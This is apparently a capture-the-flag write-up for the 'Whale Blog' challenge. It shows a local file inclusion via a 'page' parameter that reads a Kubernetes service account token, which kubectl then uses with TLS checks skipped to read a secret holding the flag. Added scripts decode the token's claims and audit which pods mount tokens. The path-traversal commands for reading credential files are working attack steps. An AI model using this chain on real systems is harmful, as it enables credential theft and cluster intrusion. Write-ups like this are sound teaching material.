Tags: kubernetes lfi 

# writeup
Write up for the `Whale Blog` challenge

## Enumeration phase

After checking the source of `http://whale-blog.duc.tf:30000/` we can see useful information:
```html
Warning: Undefined array key "page" in /var/www/html/index.php on line 3
```
* the `page` parameter can be changed
* files are in the `/var/www/html/` directory

```html
I wonder if we will deploy this at whale-blog.duc.tf or at whale-endpoint.duc.tf
```
* two domains exist, `whale-blog.duc.tf` and `whale-endpoint.duc.tf`, and the application is containerised in Docker

Based on the above information we can predict that we're dealing with an application in a Docker container and that the orchestrator is probably Kubernetes (`whale-endpoint.duc.tf`).
We can confirm it by making a request to this endpoint:
```bash
curl -k https://whale-endpoint.duc.tf/api/
```
and as a result we can see:
```json
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {

},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/api/\"",
"reason": "Forbidden",
"details": {

},
"code": 403
}
```
which means an unauthenticated user (`system:anonymous`) is forbidden from reading the API.

## Use LFI for getting the credentials

We can use the existing LFI to read the pod's service account credentials by requesting `http://whale-blog.duc.tf:30000/?page=../../../../var/run/secrets/kubernetes.io/serviceaccount/token`

```bash
# the token is echoed back inside a <pre> element; keep only its contents
curl -s 'http://whale-blog.duc.tf:30000/?page=../../../../var/run/secrets/kubernetes.io/serviceaccount/token' \
  | sed -n 's/.*<pre>\(.*\)<\/pre>.*/\1/p' > token
```
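The file read above is a service account JWT, and even before it is used against the API server its payload already tells us which namespace and service account the pod runs as. The following script is an added example (not part of the original writeup) that decodes the claims of such a token without verifying it; the sample token it builds is constructed in the shape of a legacy secret-backed service account token, with a placeholder namespace, UID and signature rather than values from the challenge. It also handles the nested `kubernetes.io` claim layout that newer bound tokens use.

```python
import base64
import json


def b64url_encode(data: bytes) -> str:
    """base64url without padding, the encoding JWT segments use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode: restore the stripped '=' padding first."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_claims(token: str) -> dict:
    """Return the payload of a JWT WITHOUT verifying its signature.

    Verification is the API server's job; here we only want to see what a
    leaked token reveals, which needs no key at all.
    """
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    return json.loads(b64url_decode(parts[1]))


def summarize_sa_token(token: str) -> dict:
    """Pull out the identity a Kubernetes service account token asserts.

    Legacy (secret-backed) tokens carry flat 'kubernetes.io/serviceaccount/*'
    claims; bound tokens nest the same data under a 'kubernetes.io' object.
    """
    claims = decode_claims(token)
    bound = claims.get("kubernetes.io", {})
    return {
        "subject": claims.get("sub"),
        "namespace": claims.get("kubernetes.io/serviceaccount/namespace")
        or bound.get("namespace"),
        "service_account": claims.get("kubernetes.io/serviceaccount/service-account.name")
        or bound.get("serviceaccount", {}).get("name"),
        "expires": claims.get("exp"),  # None for legacy tokens: they never expire
    }


# Constructed sample: shaped like a legacy service account token and signed
# with a dummy signature. Namespace, secret name and UID are placeholders.
_SAMPLE_CLAIMS = {
    "iss": "kubernetes/serviceaccount",
    "kubernetes.io/serviceaccount/namespace": "example-ns",
    "kubernetes.io/serviceaccount/secret.name": "default-token-abcde",
    "kubernetes.io/serviceaccount/service-account.name": "default",
    "kubernetes.io/serviceaccount/service-account.uid": "00000000-0000-0000-0000-000000000000",
    "sub": "system:serviceaccount:example-ns:default",
}
SAMPLE_TOKEN = ".".join([
    b64url_encode(json.dumps({"alg": "RS256", "kid": "placeholder"}).encode()),
    b64url_encode(json.dumps(_SAMPLE_CLAIMS).encode()),
    b64url_encode(b"not-a-real-signature"),
])

if __name__ == "__main__":
    print(json.dumps(summarize_sa_token(SAMPLE_TOKEN), indent=2))
```

Run it against the real `token` file by replacing `SAMPLE_TOKEN` with its contents; the absence of an `exp` claim is the tell that a cluster still hands out long-lived legacy tokens, which is exactly why a one-off file read is enough to keep using the identity afterwards.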

## Get the flag using the Kubernetes API

Once we have the token we can start working with the Kubernetes API:
```bash
kubectl config set-cluster ductf --server=https://whale-endpoint.duc.tf/
kubectl get pods --token=$(cat token)
```

We get a TLS certificate error, but we can ignore it with the `--insecure-skip-tls-verify` option and read the secret:
```bash
kubectl --insecure-skip-tls-verify --token=$(cat token) get secrets
kubectl --insecure-skip-tls-verify --token=$(cat token) get secret nooooo-dont-read-me -o jsonpath="{.data}"
```

After base64 decoding the output we have the flag.
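The whole chain worked because the web pod had a service account token mounted at the default path even though the PHP application never needed to talk to the API server. The script below is an added example, not from the original writeup, that audits which pods in a cluster would have a token mounted, following the same precedence the kubelet applies: the pod's `automountServiceAccountToken` wins, then the ServiceAccount's, and unset on both means the token is mounted. The pod list and service account settings are constructed inline in the shape of `kubectl get pods -A -o json`, with placeholder names rather than the challenge's real objects.

```python
# Constructed sample in the shape of `kubectl get pods -A -o json`.
SAMPLE_POD_LIST = {
    "kind": "PodList",
    "items": [
        {   # a typical web pod: nothing set, so the token is mounted by default
            "metadata": {"name": "blog-web", "namespace": "blog"},
            "spec": {"containers": [{"name": "php", "image": "php:8-apache"}]},
        },
        {   # explicitly opted out at pod level
            "metadata": {"name": "batch-job", "namespace": "blog"},
            "spec": {"automountServiceAccountToken": False,
                     "serviceAccountName": "default",
                     "containers": [{"name": "job", "image": "busybox"}]},
        },
        {   # opted out via its ServiceAccount (see SAMPLE_SERVICE_ACCOUNTS)
            "metadata": {"name": "static-site", "namespace": "web"},
            "spec": {"serviceAccountName": "static",
                     "containers": [{"name": "nginx", "image": "nginx"}]},
        },
        {   # pod-level True overrides a ServiceAccount that says False
            "metadata": {"name": "admin-cli", "namespace": "web"},
            "spec": {"automountServiceAccountToken": True,
                     "serviceAccountName": "static",
                     "containers": [{"name": "cli", "image": "bitnami/kubectl"}]},
        },
    ],
}

# (namespace, name) -> automountServiceAccountToken as set on the ServiceAccount
# object itself (None = unset). Constructed to match the pods above.
SAMPLE_SERVICE_ACCOUNTS = {
    ("blog", "default"): None,
    ("web", "static"): False,
}


def token_is_mounted(pod, service_accounts):
    """Mirror the kubelet's decision: the pod field wins, then the
    ServiceAccount's field, and unset on both means the token IS mounted."""
    spec = pod.get("spec", {})
    pod_flag = spec.get("automountServiceAccountToken")
    if pod_flag is not None:
        return bool(pod_flag)
    # a pod that names no service account runs as 'default' in its namespace
    key = (pod["metadata"]["namespace"], spec.get("serviceAccountName", "default"))
    sa_flag = service_accounts.get(key)
    return True if sa_flag is None else bool(sa_flag)


def pods_exposing_tokens(pod_list, service_accounts):
    """Return 'namespace/pod' for every pod whose filesystem carries a token."""
    return [
        f"{p['metadata']['namespace']}/{p['metadata']['name']}"
        for p in pod_list["items"]
        if token_is_mounted(p, service_accounts)
    ]


if __name__ == "__main__":
    for name in pods_exposing_tokens(SAMPLE_POD_LIST, SAMPLE_SERVICE_ACCOUNTS):
        print("token mounted:", name)
```

Every pod this reports is one where a file read primitive like the `page` parameter turns into API credentials; for workloads that never call the API, setting `automountServiceAccountToken: false` removes the file entirely, and for the rest, the RBAC bound to that service account decides whether `get secrets` succeeds as it did here.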

Original writeup (https://github.com/flusive/writeups/blob/main/DownUnderCTF2021/Whale-Blog/writeup.md).